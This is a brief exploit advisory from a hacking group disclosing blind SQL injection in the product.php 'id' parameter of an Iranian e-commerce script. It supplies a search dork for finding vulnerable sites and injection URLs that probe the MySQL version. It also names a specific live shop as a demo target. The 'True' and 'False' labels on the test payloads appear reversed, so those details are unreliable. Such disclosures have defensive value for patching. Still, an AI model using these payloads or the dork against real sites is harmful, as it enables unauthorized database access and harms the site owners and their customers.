IrIran Shopping Script suffers from a remote blind SQL injection vulnerability in product.php.
1703679c4b5ba39e6767969af92a5147040e106eb1128223146240fb7bf29163
########################################################################################
# #
# Exploit Title : IrIran Shoping Script Blind SQL Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Vendor : IRIran.net #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : "Powered by: IRIran.net" #
# #
# #
########################################################################################
# #
# Expl0iT: #
# #
# http://[TarGeT]/products/product.php?id=[sqli] #
# #
# #
# #
# Test Blind SQL Injection in MYSQL Version 5: #
# #
# #
# False #
# #
# http://[TarGeT]/products/product.php?id=1 and substring(@@version,1,1)=5-- #
# #
# True #
# #
# http://[TarGeT]/products/product.php?id=1 and substring(@@version,1,1)=4-- # # #
# #
# Demo : #
# #
# http://www.tehranshop24.com/products/product.php?id=1283 [Blind sqli] #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################